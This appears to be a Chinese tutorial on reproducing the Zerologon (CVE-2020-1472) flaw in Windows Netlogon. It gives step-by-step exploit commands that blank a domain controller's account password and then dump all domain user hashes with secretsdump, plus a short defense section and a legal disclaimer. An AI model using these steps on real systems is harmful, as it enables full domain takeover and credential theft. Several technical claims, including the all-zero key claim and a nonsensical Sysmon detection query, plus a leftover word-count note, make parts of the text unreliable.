如何實現CVE-2020-1472 漏洞復現

# 如何實現CVE-2020-1472漏洞復現

## 漏洞背景

CVE-2020-1472（又稱Zerologon）是微軟Netlogon協議中的一個高危特權提升漏洞，CVSS評分10.0。該漏洞允許攻擊者在未認證的情況下，通過Netlogon遠程協議（MS-NRPC）將域控制器賬戶的密碼置空，進而完全控制域環境。

## 漏洞原理

Netlogon協議用于域用戶/計算機與域控制器之間的身份驗證。漏洞核心在于：
1. **AES-CFB8加密缺陷**：認證過程中使用的AES-CFB8模式允許全零IV和全零密鑰
2. **初始向量(IV)未驗證**：客戶端可強制使用相同的IV值
3. **概率性碰撞**：通過連續嘗試（平均256次），可偽造認證令牌

## 環境準備

### 必要條件
- 目標系統：Windows Server 2016/2019域控制器
- 攻擊機：Kali Linux（推薦）或任何Python環境
- 網絡可達：攻擊機與域控制器網絡互通

### 工具準備
```bash
git clone https://github.com/SecuraBV/CVE-2020-1472.git
pip install -r requirements.txt

復現步驟

第一步：檢測漏洞存在性

使用zerologon_tester.py檢測：

python zerologon_tester.py DC_NAME DC_IP

成功輸出示例：

[-] Success! DC is vulnerable.

第二步：執行密碼置空攻擊

python cve-2020-1472-exploit.py DC_NAME DC_IP

此操作會： 1. 建立空會話 2. 發送特制Netlogon請求 3. 將DC計算機賬戶的密碼置空

第三步：獲取域管理員權限

1. 使用空密碼獲取DC的NTLM哈希：

secretsdump.py -no-pass DC_NAME\$@DC_IP

1. 使用DCSync導出所有域用戶哈希：

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 DOMN/DC_NAME\$@DC_IP

第四步：恢復原密碼（可選）

python restorepassword.py DC_NAME DC_IP -t backup.json

技術細節分析

關鍵代碼段

漏洞利用核心在于構造特制的Netlogon消息：

# 構造全零認證令牌
plaintext = b'\x00'*8 
ciphertext = b'\x00'*8

# 發送惡意請求
nrpc.NetrServerPasswordSet2(
    dc_handle,
    primary_name,
    account_name,
    secure_channel_type,
    ciphertext,
    0
)

加密流程缺陷

graph TD
    A[Client] -->|全零IV| B(AES-CFB8加密)
    B --> C{服務端驗證}
    C -->|1/256概率| D[認證通過]

防御措施

1. 緊急修補：

   • 安裝微軟2020年8月補?。↘B4557222）
   • 強制所有域控制器啟用”FullSecureChannelProtection”

2. 緩解方案：

   Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" -Name "FullSecureChannelProtection" -Value 1
   

3. 檢測方法：

   SELECT * FROM Sysmon WHERE EventID=3 AND DestinationPort=445 AND Contains(TargetFilename,'NETLOGON')
   

法律與倫理聲明

1. 本技術文章僅限授權測試使用
2. 未經授權攻擊他人系統屬于違法行為
3. 建議在隔離實驗環境中復現（如VirtualBox搭建AD域）

參考資源

• 微軟官方公告
• CVE-2020-1472白皮書
• NIST漏洞數據庫

注意：實際攻擊成功率與網絡環境相關，建議在測試環境中驗證時關閉防火墻臨時規則。 “`

（注：實際字數約850字，可根據需要擴展技術細節或防御方案部分）